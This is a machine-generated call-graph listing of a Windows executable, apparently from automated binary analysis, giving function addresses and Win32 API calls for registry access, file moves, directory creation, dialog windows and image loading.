32692->32688 32692->32690 32692->32691 32869 ddd65b 24 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32692->32869 32871 dc5d81 41 API calls 32692->32871 32872 dce619 45 API calls __EH_prolog3_GS 32692->32872 32874 dc1279 41 API calls 32692->32874 32875 dd4d61 88 API calls 32692->32875 32876 dde57b 41 API calls 2 library calls 32692->32876 32694 dc2369 32693->32694 32695 dc2354 32693->32695 32934 dd391a SetWindowLongW 32694->32934 32697 dc2367 32695->32697 32911 dd357d 32695->32911 32697->32518 32697->32519 32697->32646 32697->32658 32939 df8246 32699->32939 32701 dc22ca GetDlgItem 32702 dc22e5 32701->32702 32703 dc22f7 32701->32703 32704 dc1d16 41 API calls 32702->32704 32940 dc2234 32703->32940 32706 dc22f2 32704->32706 32954 dc1743 32706->32954 32708 dc230c 32709 df81f5 5 API calls 32708->32709 32710 dc2333 32709->32710 32711 dc2215 GetDlgItem ShowWindow 32710->32711 32711->32541 32713 dd03b9 GetVersionExW 32712->32713 32714 dd03f8 32712->32714 32715 dd03e0 32713->32715 32718 dd03d0 32713->32718 32716 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32714->32716 32715->32714 32717 dd040a 32716->32717 32717->32680 32718->32715 32958 dd019e 30 API calls 2 library calls 32718->32958 32722 de1355 __EH_prolog3_GS 32720->32722 32721 de13e3 32723 df81f5 5 API calls 32721->32723 32722->32721 32725 dc21e6 41 API calls 32722->32725 32724 de13f0 32723->32724 32724->32680 32726 de137c 32725->32726 32959 de12e9 32726->32959 32728 de138b RegCreateKeyExW 32728->32721 32729 de13b0 32728->32729 32730 de13d0 RegSetValueExW RegCloseKey 32729->32730 32730->32721 32738 dcf088 __EH_prolog3_GS 32731->32738 32732 df81f5 5 API calls 32733 dcf147 32732->32733 32733->32680 32734 dcf114 32735 dcefb4 50 API calls 32734->32735 32737 dcf096 32734->32737 32735->32737 32736 dc855e 41 API calls 32736->32738 32737->32732 32738->32734 32738->32736 32738->32737 32962 dcefb4 32738->32962 32983 dc126f 32740->32983 32742 dd1a7b SetCurrentDirectoryW 32742->32680 32744 ddc7b6 4 API calls 32743->32744 32745 ddd4e7 32744->32745 32746 ddd5bc 32745->32746 32747 ddd4ef GetWindow 32745->32747 32748 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32746->32748 32752 ddd505 32747->32752 32749 ddd5cd 32748->32749 32749->32525 32750 ddd511 GetClassNameW 32984 dd84ba CompareStringW 32750->32984 32752->32746 32752->32750 32753 ddd5a2 GetWindow 32752->32753 32754 ddd544 SendMessageW 32752->32754 32753->32746 32753->32752 32754->32753 32756 ddd55c 32754->32756 32985 ddc795 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32756->32985 32986 ddc774 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32756->32986 32987 ddc7ff 11 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32756->32987 32759 ddd58c SendMessageW DeleteObject 32759->32753 32988 dc126f 32760->32988 32762 dc2342 SetDlgItemTextW 32762->32544 32764 ddcb2e SizeofResource 32763->32764 32765 ddcc11 32763->32765 32764->32765 32766 ddcb45 LoadResource 32764->32766 32777 ddc7b6 32765->32777 32766->32765 32767 ddcb5a LockResource 32766->32767 32767->32765 32768 ddcb6b GlobalAlloc 32767->32768 32768->32765 32769 ddcb83 GlobalLock 32768->32769 32770 ddcc0a GlobalFree 32769->32770 32771 ddcb8e __InternalCxxFrameHandler 32769->32771 32770->32765 32772 ddcc03 GlobalUnlock 32771->32772 32989 ddd151 32771->32989 32772->32770 32774 ddcbb6 32774->32772 32775 ddcbf1 32774->32775 32995 ddd00a 32774->32995 32775->32772 33006 ddc774 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32777->33006 32779 ddc7be 32780 ddc7cb 32779->32780 33007 ddc795 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32779->33007 32780->32557 32780->32566 33008 dc126f 32782->33008 32784 dc22b4 SetWindowTextW 32784->32590 32786 ddc63d 32785->32786 32787 ddc618 32785->32787 32789 ddc64b 32786->32789 32790 ddc642 SHAutoComplete 32786->32790 33009 dd84ba CompareStringW 32787->33009 32791 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32789->32791 32790->32789 32793 ddc656 32791->32793 32792 ddc62b 32792->32786 32794 ddc62f FindWindowExW 32792->32794 32795 dde2f5 32793->32795 32794->32786 32796 dde311 ___scrt_uninitialize_crt 32795->32796 33010 dc278a 32796->33010 32798 dde342 33032 dc2b4a 32798->33032 32801 dde35e 32803 dc29f1 92 API calls 32801->32803 32802 dde367 33039 dc2593 32802->33039 32806 dde363 32803->32806 32808 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32806->32808 32809 dde396 32808->32809 32809->32607 32811 ddfb61 __EH_prolog3_GS 32810->32811 32812 dc21e6 41 API calls 32811->32812 32838 ddfb7c 32812->32838 32814 de0c5e 32815 df81f5 5 API calls 32814->32815 32816 de0c6e 32815->32816 32816->32661 32821 dc21e6 41 API calls 32821->32838 32822 dc22aa SetWindowTextW 32822->32838 32823 dc8cb5 41 API calls 32823->32838 32824 dd1a88 43 API calls 32824->32838 32826 dd0d19 41 API calls 32826->32838 32827 dc1274 41 API calls 32827->32838 32830 dca722 41 API calls 32830->32838 32831 dc335d 41 API calls 32831->32838 32832 dc855e 41 API calls 32832->32838 32836 dc22aa SetWindowTextW 32836->32838 32838->32814 32838->32821 32838->32822 32838->32823 32838->32824 32838->32826 32838->32827 32838->32830 32838->32831 32838->32832 32840 de01e1 SendMessageW 32838->32840 32841 dc1d16 41 API calls 32838->32841 32856 dc3060 41 API calls 32838->32856 32861 ddfcfb 32838->32861 33412 dd6099 32838->33412 33416 ddd728 32838->33416 33435 de13f1 32838->33435 33455 de0caa 32838->33455 33459 dcb454 41 API calls 32838->33459 33460 de151b 41 API calls 32838->33460 33461 dcf873 41 API calls 32838->33461 33462 dcf8a1 41 API calls 32838->33462 33473 dcf8b5 48 API calls __EH_prolog3_GS 32838->33473 33474 dcf887 FindClose 32838->33474 33475 de1163 41 API calls __EH_prolog3_GS 32838->33475 33476 dcb435 41 API calls 32838->33476 33477 dd0cf6 41 API calls 32838->33477 33478 dd1db0 41 API calls 32838->33478 33479 de1536 39 API calls 32838->33479 32840->32838 32841->32838 32846 de020c SendMessageW 32846->32838 32848 dc21e6 41 API calls 32848->32861 32856->32838 32858 dc3060 41 API calls 32858->32861 32859 dcf2f2 45 API calls 32859->32861 32860 ddfeb2 MoveFileW 32860->32861 32861->32838 32861->32846 32861->32848 32861->32858 32861->32859 32861->32860 32862 ddfeca MoveFileExW 32861->32862 33463 dcf34e 45 API calls __EH_prolog3_GS 32861->33463 33464 dd13db 41 API calls __EH_prolog3_GS 32861->33464 33465 dd0cf6 41 API calls 32861->33465 33466 dd0c69 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32861->33466 33467 dc8584 41 API calls 32861->33467 33468 dcf58e 45 API calls __EH_prolog3_GS 32861->33468 33469 dc62c5 41 API calls 32861->33469 33470 dd1d51 41 API calls 32861->33470 33471 dcda96 41 API calls 32861->33471 33472 dc138d 41 API calls 32861->33472 32862->32861 32863->32551 32864->32531 32865->32680 32867 dcf2f2 45 API calls 32866->32867 32868 dcf2ca 32867->32868 32868->32680 32869->32680 32870->32692 32871->32692 32872->32692 32873->32680 32874->32692 32875->32692 32876->32692 32877->32680 32878->32650 32879->32680 32880->32680 32881->32616 32882->32580 32883->32583 32884->32586 33483 ddba59 LoadCursorW RegisterClassExW 32885->33483 32887 ddb92d 32888 ddb93b 32887->32888 32889 deba9e ___std_exception_destroy 14 API calls 32887->32889 32890 ddb940 GetWindowRect GetParent MapWindowPoints 32888->32890 33484 dec5a4 40 API calls 2 library calls 32888->33484 32889->32888 32893 ddb97b DestroyWindow 32890->32893 32894 ddb984 GetParent CreateWindowExW 32890->32894 32893->32894 32895 ddb9d1 32894->32895 32896 ddba10 32894->32896 32895->32896 32901 ddb9d6 32895->32901 32897 ddba14 ShowWindow UpdateWindow 32896->32897 32898 ddba26 32896->32898 32897->32898 32899 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32898->32899 32900 ddba35 32899->32900 32900->32645 32901->32898 33485 ddbf19 16 API calls ___std_exception_copy 32901->33485 32903 ddb9f0 32903->32898 32904 ddb9f6 ShowWindow SetWindowTextW 32903->32904 32905 deba9e ___std_exception_destroy 14 API calls 32904->32905 32906 ddba0d 32905->32906 32906->32898 32907->32685 32908->32642 32909->32638 32910->32521 32912 dcf858 43 API calls 32911->32912 32913 dd35b9 32912->32913 32935 dd80d1 WideCharToMultiByte 32913->32935 32915 dd363a 32937 dd3848 46 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32915->32937 32917 dd35ce _strlen 32917->32915 32922 dd361a SetDlgItemTextW 32917->32922 32936 dd325b 39 API calls 32917->32936 32918 dd364e GetWindowRect GetClientRect 32920 dd3737 32918->32920 32926 dd36a1 GetWindowRect 32918->32926 32938 dd351c 44 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32920->32938 32922->32917 32923 dd3752 32924 dd3765 GetSystemMetrics GetWindow 32923->32924 32925 dd3756 SetWindowTextW 32923->32925 32927 dd378d 32924->32927 32928 dd3831 32924->32928 32925->32924 32926->32920 32927->32928 32932 dd37a0 GetWindowRect 32927->32932 32929 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32928->32929 32930 dd3842 32929->32930 32930->32697 32933 dd3817 GetWindow 32932->32933 32933->32927 32933->32928 32934->32697 32935->32917 32936->32917 32937->32918 32938->32923 32939->32701 32941 dc2240 __EH_prolog3_GS 32940->32941 32942 dc21e6 41 API calls 32941->32942 32943 dc2252 GetWindowTextLengthW 32942->32943 32944 dc1a88 41 API calls 32943->32944 32945 dc2268 32944->32945 32946 dc227a GetWindowTextW 32945->32946 32947 dc228a 32946->32947 32948 dc1d16 41 API calls 32947->32948 32949 dc2292 32948->32949 32950 dc189d 39 API calls 32949->32950 32951 dc229a 32950->32951 32952 df81f5 5 API calls 32951->32952 32953 dc22a9 32952->32953 32953->32706 32955 dc1753 32954->32955 32956 dc16e6 41 API calls 32955->32956 32957 dc175b 32956->32957 32957->32708 32958->32715 32960 dc335d 41 API calls 32959->32960 32961 de12f5 32960->32961 32961->32728 32965 dcefc0 __EH_prolog3_GS 32962->32965 32963 dcefec 32964 dcf2c4 45 API calls 32963->32964 32967 dceff7 32964->32967 32965->32963 32966 dcefdf CreateDirectoryW 32965->32966 32966->32963 32968 dcf038 32966->32968 32969 dcf04a GetLastError 32967->32969 32972 dc21e6 41 API calls 32967->32972 32970 dcf03c 32968->32970 32971 dcf046 32968->32971 32969->32971 32982 dcf34e 45 API calls __EH_prolog3_GS 32970->32982 32974 df81f5 5 API calls 32971->32974 32975 dcf003 32972->32975 32976 dcf067 32974->32976 32977 dd1520 43 API calls 32975->32977 32976->32738 32978 dcf011 32977->32978 32979 dcf028 32978->32979 32980 dcf015 32978->32980 32979->32968 32979->32969 32981 dcf01f CreateDirectoryW 32980->32981 32981->32979 32982->32971 32984->32752 32985->32756 32986->32756 32987->32759 32999 ddd063 GdipAlloc 32989->32999 32991 ddd159 32992 ddd168 32991->32992 33000 ddd11a 32991->33000 32992->32774 32994 ddd166 32994->32774 33005 dc165b 32995->33005 32997 ddd016 GdipCreateHBITMAPFromBitmap 32998 ddd02c 32997->32998 32998->32775 32999->32991 33004 ddd038 33000->33004 33002 ddd126 GdipCreateBitmapFromStream 33003 ddd14a 33002->33003 33003->32994 33004->33002 33005->32997 33006->32779 33007->32780 33009->32792 33011 dc2796 __EH_prolog3 33010->33011 33012 dce36e 41 API calls 33011->33012 33013 dc27a3 33012->33013 33049 dd2345 33013->33049 33015 dc27c4 33055 dc2931 33015->33055 33017 dc27dc 33058 dc2948 33017->33058 33020 dc2948 41 API calls 33021 dc27f2 33020->33021 33063 dc2982 33021->33063 33024 dc21e6 41 API calls 33025 dc2808 33024->33025 33026 de2853 16 API calls 33025->33026 33028 dc283b 33025->33028 33027 dc282c 33026->33027 33066 dc8369 33027->33066 33096 dd0031 33028->33096 33031 dc28c0 CallUnexpected 33031->32798 33145 dce5e6 33032->33145 33036 dc2b69 33038 dc2b5c 33036->33038 33178 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33036->33178 33038->32801 33038->32802 33040 dc25ac 33039->33040 33041 dc25b0 33039->33041 33043 dc29f1 33040->33043 33230 dc25f7 33041->33230 33044 dc2a03 33043->33044 33046 dc2a13 33043->33046 33044->33046 33410 dc2a65 39 API calls 33044->33410 33411 dd2444 92 API calls 33046->33411 33050 dd2351 __EH_prolog3 33049->33050 33051 de2853 16 API calls 33050->33051 33052 dd238a 33051->33052 33053 de2853 16 API calls 33052->33053 33054 dd23a6 CallUnexpected 33053->33054 33054->33015 33056 dc21e6 41 API calls 33055->33056 33057 dc293c 33056->33057 33057->33017 33059 dc21e6 41 API calls 33058->33059 33060 dc2953 33059->33060 33061 dc21e6 41 API calls 33060->33061 33062 dc27e7 33061->33062 33062->33020 33104 dc3088 33063->33104 33067 dc8375 __EH_prolog3 33066->33067 33139 dd0820 GetCurrentProcess GetProcessAffinityMask 33067->33139 33069 dc837f 33070 dc21e6 41 API calls 33069->33070 33071 dc838a 33070->33071 33072 dc21e6 41 API calls 33071->33072 33073 dc8399 33072->33073 33074 dc21e6 41 API calls 33073->33074 33075 dc83a4 33074->33075 33076 dc21e6 41 API calls 33075->33076 33077 dc83af 33076->33077 33078 dc21e6 41 API calls 33077->33078 33079 dc83ba 33078->33079 33080 dc21e6 41 API calls 33079->33080 33081 dc83c5 33080->33081 33082 dc21e6 41 API calls 33081->33082 33083 dc83d0 33082->33083 33084 dc21e6 41 API calls 33083->33084 33085 dc83db 33084->33085 33086 dc21e6 41 API calls 33085->33086 33087 dc83e6 33086->33087 33088 dc21e6 41 API calls 33087->33088 33089 dc83f1 33088->33089 33090 dc21e6 41 API calls 33089->33090 33091 dc83fc 33090->33091 33140 dd4bb0 88 API calls 2 library calls 33091->33140 33093 dc8442 33141 dc845c GetCurrentProcess GetProcessAffinityMask 33093->33141 33097 dd0056 CallUnexpected 33096->33097 33098 dc21e6 41 API calls 33097->33098 33099 dd0062 33098->33099 33142 dd0090 33099->33142 33101 dd0077 33102 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33101->33102 33103 dd008c 33102->33103 33103->33031 33105 dc3095 33104->33105 33108 dc32e0 33105->33108 33107 dc27fd 33107->33024 33109 dc330f 33108->33109 33111 dc3321 33109->33111 33112 dc3628 33109->33112 33111->33107 33113 dc3631 33112->33113 33116 dc1eb0 33113->33116 33115 dc3638 33115->33111 33117 dc1eb5 33116->33117 33118 dc1ec5 33117->33118 33119 dc1e81 33117->33119 33120 dc1ea8 33118->33120 33126 dc1ecd 33118->33126 33122 dc1e8c 33119->33122 33119->33126 33121 de2853 16 API calls 33120->33121 33123 dc1eae 33121->33123 33135 dc1ea8 16 API calls 33122->33135 33123->33115 33125 dc1e93 33127 dc1e99 33125->33127 33128 dc1ea3 33125->33128 33126->33115 33131 dc2062 33126->33131 33136 de615b RaiseException 33126->33136 33127->33115 33137 de797b 39 API calls CallUnexpected 33128->33137 33131->33115 33132 de7a4e 33138 de7a5c 11 API calls CallUnexpected 33132->33138 33134 de7a5b 33135->33125 33136->33126 33137->33132 33138->33134 33139->33069 33140->33093 33143 dc3060 41 API calls 33142->33143 33144 dd0105 33143->33144 33144->33101 33146 dce5fd 33145->33146 33150 dce450 48 API calls 33146->33150 33147 dce601 33148 dc2b58 33147->33148 33179 dc9f60 84 API calls __EH_prolog3_GS 33147->33179 33148->33038 33151 dc2be2 33148->33151 33150->33147 33152 dc2bee __EH_prolog3 33151->33152 33176 dce910 88 API calls 33152->33176 33153 dc2c1a 33154 dc2d8e CallUnexpected 33153->33154 33167 dc2c3a 33153->33167 33180 dc3040 33153->33180 33154->33036 33157 dc2db1 33195 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33157->33195 33160 dc2dbe 33160->33154 33184 dc3afa 33160->33184 33161 dc2e45 33161->33154 33168 dc2e78 33161->33168 33196 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33161->33196 33162 dc2c99 33173 dce910 88 API calls 33162->33173 33164 dc2dfc 33164->33161 33166 dc3afa 113 API calls 33164->33166 33165 dc335d 41 API calls 33165->33154 33166->33164 33167->33154 33167->33157 33167->33160 33168->33154 33171 dc2f50 33168->33171 33174 dced30 85 API calls 33168->33174 33169 dc3afa 113 API calls 33172 dc2ece 33169->33172 33170 dc2cbf 33170->33167 33177 dce910 88 API calls 33170->33177 33171->33154 33171->33165 33172->33169 33172->33171 33173->33170 33174->33172 33175 dced30 85 API calls 33175->33162 33176->33153 33177->33167 33178->33038 33179->33148 33181 dc304e 33180->33181 33197 dc311f 33181->33197 33185 dc3b0d 33184->33185 33186 dc3b11 33184->33186 33185->33164 33194 dced30 85 API calls 33186->33194 33187 dc3b22 33188 dc3b3c 33187->33188 33189 dc3b4a 33187->33189 33188->33185 33227 dc47b8 98 API calls __EH_prolog3_GS 33188->33227 33228 dc3cd4 111 API calls 3 library calls 33189->33228 33192 dc3b48 33192->33185 33229 dc3c43 80 API calls 33192->33229 33194->33187 33195->33154 33196->33168 33202 dc315a 33197->33202 33199 dc312c 33210 dc314f 33199->33210 33201 dc2c84 33201->33175 33203 dc3162 33202->33203 33204 dc3169 33203->33204 33205 dc3175 33203->33205 33215 dc317b 33204->33215 33218 dc18dd 41 API calls std::_Xinvalid_argument 33205->33218 33211 dc309f 33210->33211 33212 dc3159 33210->33212 33214 dc30b4 33211->33214 33219 dc34c4 33211->33219 33212->33201 33214->33201 33216 dc3628 41 API calls 33215->33216 33217 dc3171 33216->33217 33217->33199 33222 dc1daf 33219->33222 33221 dc34d1 33221->33214 33223 dc1dbf 33222->33223 33224 dc1dc3 33223->33224 33226 dc1d95 39 API calls CallUnexpected 33223->33226 33224->33221 33226->33224 33227->33192 33228->33192 33229->33185 33231 dc2606 33230->33231 33232 dc264f 33230->33232 33233 dc3afa 113 API calls 33231->33233 33238 dc3b90 33232->33238 33237 dc262b 33233->33237 33237->33040 33240 dc3b9a 33238->33240 33239 dc3afa 113 API calls 33239->33240 33240->33239 33242 dc2672 33240->33242 33265 dd65b5 33240->33265 33242->33237 33243 dc2690 33242->33243 33244 dc269c __EH_prolog3_GS 33243->33244 33273 dc5a0b 33244->33273 33248 dc26ce 33250 dc26ea 33248->33250 33251 dc26d7 33248->33251 33249 df81f5 5 API calls 33254 dc2748 33249->33254 33252 dc2710 33250->33252 33253 dc26f3 33250->33253 33306 dd836c 41 API calls 33251->33306 33308 dc3821 41 API calls 33252->33308 33307 dd81e2 41 API calls 2 library calls 33253->33307 33254->33237 33256 dc26fe 33258 dc3060 41 API calls 33256->33258 33260 dc26e8 33258->33260 33260->33249 33261 dc2721 33309 dd8134 42 API calls 2 library calls 33261->33309 33263 dc272f 33310 dc34d4 39 API calls 33263->33310 33266 dd65bc 33265->33266 33267 dd65d7 33266->33267 33271 dca0c9 RaiseException CallUnexpected 33266->33271 33269 dd65e8 SetThreadExecutionState 33267->33269 33272 dca0c9 RaiseException CallUnexpected 33267->33272 33269->33240 33271->33267 33272->33269 33274 dc5a26 ___scrt_uninitialize_crt 33273->33274 33275 dc5a6d 33274->33275 33276 dc5a51 33274->33276 33278 dc5cbc 33275->33278 33281 dc5a99 33275->33281 33357 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33276->33357 33366 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33278->33366 33280 dc5a5c 33282 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33280->33282 33281->33280 33311 dda9a6 33281->33311 33283 dc26bb 33282->33283 33283->33260 33305 dc3ac6 41 API calls 33283->33305 33285 dc5b17 33292 dc5b21 33285->33292 33359 dc650e 33285->33359 33286 dc5bb4 33328 dcfccc 33286->33328 33288 dc5b07 33358 dc30e4 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33288->33358 33292->33286 33304 dc5b12 33292->33304 33362 dd2720 89 API calls 33292->33362 33295 dc5bc7 33296 dc5c3e 33295->33296 33297 dc5c29 33295->33297 33363 ddab7e 108 API calls 33296->33363 33332 dccfa1 33297->33332 33300 dc5c3c 33364 dcfec9 5 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33300->33364 33302 dc5c76 33302->33304 33365 dc5d41 80 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 33302->33365 33343 dda8be 33304->33343 33305->33248 33306->33260 33307->33256 33308->33261 33309->33263 33310->33260 33312 dda9b6 33311->33312 33313 ddaa0c 33312->33313 33315 ddaa23 33312->33315 33327 dc5aec 33312->33327 33368 de615b RaiseException 33313->33368 33314 dec028 ___std_exception_copy 15 API calls 33317 ddaa58 33314->33317 33315->33314 33315->33317 33319 ddab39 33315->33319 33318 ddaa89 33317->33318 33317->33319 33324 ddaaad CallUnexpected 33317->33324 33320 ddaa99 33318->33320 33322 deba9e ___std_exception_destroy 14 API calls 33318->33322 33369 de615b RaiseException 33319->33369 33367 dda60f 16 API calls 2 library calls 33320->33367 33322->33320 33326 deba9e ___std_exception_destroy 14 API calls 33324->33326 33324->33327 33325 ddab7d 33326->33327 33327->33285 33327->33288 33327->33292 33329 dcfcd8 __EH_prolog3 33328->33329 33330 de2853 16 API calls 33329->33330 33331 dcfceb CallUnexpected 33329->33331 33330->33331 33331->33295 33333 dccfad __EH_prolog3 33332->33333 33370 dcddd1 33333->33370 33337 dccfc1 33377 dd2483 33337->33377 33339 dccfdd 33340 dcd033 CallUnexpected 33339->33340 33342 dd2483 102 API calls 33339->33342 33389 dd2664 101 API calls __InternalCxxFrameHandler 33339->33389 33340->33300 33342->33339 33344 dda8cb 33343->33344 33345 dda8d1 33343->33345 33346 deba9e ___std_exception_destroy 14 API calls 33344->33346 33348 dda8df 33345->33348 33403 dcfcaf 92 API calls 33345->33403 33346->33345 33400 dd399e 39 API calls 33348->33400 33350 dda900 33401 dd399e 39 API calls 33350->33401 33352 dda90b 33402 dd399e 39 API calls 33352->33402 33354 dda916 33404 dd3975 39 API calls 33354->33404 33356 dda94a 33357->33280 33358->33304 33405 dc64c6 33359->33405 33361 dc6518 33361->33292 33362->33286 33363->33300 33364->33302 33365->33304 33366->33280 33367->33324 33368->33319 33369->33325 33371 dd011a 6 API calls 33370->33371 33372 dccfb7 33371->33372 33373 dcb386 33372->33373 33374 dcb396 33373->33374 33390 dcb595 33374->33390 33385 dd24a2 33377->33385 33379 dd264e 33382 dd65b5 2 API calls 33379->33382 33380 dd262e 33380->33379 33399 dc980a IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33380->33399 33384 dd254b 33382->33384 33383 dd24c0 __InternalCxxFrameHandler 33383->33380 33383->33384 33398 dd26cc 6 API calls 33383->33398 33384->33339 33385->33383 33385->33384 33388 dce910 88 API calls 33385->33388 33386 dd256e 33386->33383 33397 dcfd53 95 API calls 2 library calls 33386->33397 33388->33386 33389->33339 33391 dcb39e 33390->33391 33392 dcb5a2 33390->33392 33391->33337 33396 dcb6e1 41 API calls 33392->33396 33394 dcb5aa 33395 dc314f 39 API calls 33394->33395 33395->33391 33396->33394 33397->33383 33398->33380 33399->33379 33400->33350 33401->33352 33402->33354 33403->33348 33404->33356 33406 dc64de 33405->33406 33407 dc64d9 33405->33407 33406->33407 33409 dc6401 41 API calls 33406->33409 33407->33361 33409->33407 33410->33046 33413 dd60aa 33412->33413 33414 dd60d0 33413->33414 33415 dc8584 41 API calls 33413->33415 33414->32838 33415->33413 33417 ddd734 __EH_prolog3 33416->33417 33418 ddd746 RegOpenKeyExW 33417->33418 33419 ddd818 33418->33419 33420 ddd756 33418->33420 33421 dc335d 41 API calls 33419->33421 33422 ddd75e RegQueryValueExW 33420->33422 33423 ddd823 CallUnexpected 33421->33423 33424 ddd80b RegCloseKey 33422->33424 33425 ddd777 33422->33425 33423->32838 33424->33419 33424->33423 33426 dc1a88 41 API calls 33425->33426 33427 ddd7a5 33426->33427 33428 ddd7c4 RegQueryValueExW 33427->33428 33429 ddd7dc 33428->33429 33430 ddd7fd 33428->33430 33480 de153b 41 API calls 33429->33480 33432 dc189d 39 API calls 33430->33432 33432->33424 33433 ddd7ec 33481 dc1279 41 API calls 33433->33481 33436 de1400 __EH_prolog3_GS 33435->33436 33437 dc21e6 41 API calls 33436->33437 33454 de14ef 33436->33454 33439 de141e 33437->33439 33438 df81f5 5 API calls 33440 de01bd GetDlgItem 33438->33440 33441 de12e9 41 API calls 33439->33441 33440->32836 33442 de142b 33441->33442 33443 dc21e6 41 API calls 33442->33443 33444 de1433 33443->33444 33445 dc1d16 41 API calls 33444->33445 33446 de1447 33445->33446 33447 dc1d16 41 API calls 33446->33447 33448 de1466 33447->33448 33449 dc1d16 41 API calls 33448->33449 33450 de147f 33449->33450 33451 ddd728 45 API calls 33450->33451 33452 de14ac 33451->33452 33453 dc335d 41 API calls 33452->33453 33452->33454 33453->33454 33454->33438 33456 de0cb0 33455->33456 33457 de0cbe 33456->33457 33482 dc8584 41 API calls 33456->33482 33457->32838 33459->32838 33460->32838 33461->32838 33462->32838 33463->32861 33464->32861 33465->32861 33466->32861 33467->32861 33468->32861 33469->32861 33470->32861 33471->32861 33472->32861 33473->32838 33475->32838 33476->32838 33477->32838 33478->32838 33479->32838 33480->33433 33481->33430 33482->33456 33483->32887 33484->32890 33485->32903 33486 dd0870 33487 dd0882 CallUnexpected 33486->33487 33490 dd6fc2 33487->33490 33493 dd6f84 GetCurrentProcess GetProcessAffinityMask 33490->33493 33494 dd08da 33493->33494 33495 ddb810 33496 ddb835 33495->33496 33497 ddb81b 33495->33497 33497->33496 33499 ddc23c 33497->33499 33500 ddc253 33499->33500 33501 ddc245 33499->33501 33500->33496 33501->33500 33503 ddbdca 33501->33503 33504 ddbefd 33503->33504 33505 ddbdd9 33503->33505 33504->33500 33506 dec028 ___std_exception_copy 15 API calls 33505->33506 33507 ddbe01 33506->33507 33507->33504 33518 dd84d4 CompareStringW 33507->33518 33509 ddbe52 33511 ddbe8a 33509->33511 33528 ddc12a 15 API calls 2 library calls 33509->33528 33512 ddbe92 GlobalAlloc 33511->33512 33513 ddbea8 WideCharToMultiByte 33512->33513 33514 ddbec7 33512->33514 33513->33514 33515 deba9e ___std_exception_destroy 14 API calls 33514->33515 33516 ddbedb 33515->33516 33516->33504 33519 ddbca4 33516->33519 33518->33509 33527 ddbccd 33519->33527 33520 ddbdb9 33520->33504 33522 ddbd83 33522->33520 33523 ddbd89 ShowWindow SetWindowTextW 33522->33523 33525 deba9e ___std_exception_destroy 14 API calls 33523->33525 33526 ddbdb8 33525->33526 33526->33520 33527->33520 33529 ddbf19 16 API calls ___std_exception_copy 33527->33529 33528->33511 33529->33522 33530 dceb71 33533 dceb7b ___scrt_uninitialize_crt 33530->33533 33531 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33532 dcec1c 33531->33532 33534 dcecf7 SetFilePointer 33533->33534 33535 dceba2 33533->33535 33534->33535 33536 dced14 GetLastError 33534->33536 33535->33531 33536->33535 33543 de3287 33552 de36aa GetModuleHandleW 33543->33552 33545 de328f 33546 de32c5 33545->33546 33547 de3293 33545->33547 33554 deccf7 21 API calls CallUnexpected 33546->33554 33549 de329e 33547->33549 33553 deccd9 21 API calls CallUnexpected 33547->33553 33550 de32cd 33552->33545 33553->33549 33554->33550 33555 dc1185 33556 dc8369 90 API calls 33555->33556 33557 dc118a 33556->33557 33560 de2e66 42 API calls 33557->33560 33559 dc1194 33560->33559 33561 ddbac0 33562 ddbacf SetWindowLongW 33561->33562 33563 ddbae9 NtdllDefWindowProc_W 33561->33563 33566 ddbb03 33562->33566 33565 ddbae8 33565->33563 33567 ddbb0f __EH_prolog3 33566->33567 33568 de2853 16 API calls 33567->33568 33569 ddbbad CallUnexpected 33567->33569 33570 ddbb2f 33568->33570 33569->33565 33570->33569 33579 ddb49d 33570->33579 33572 ddbb56 33572->33569 33573 ddbbd8 33572->33573 33574 ddbc04 33572->33574 33576 dd053c 17 API calls 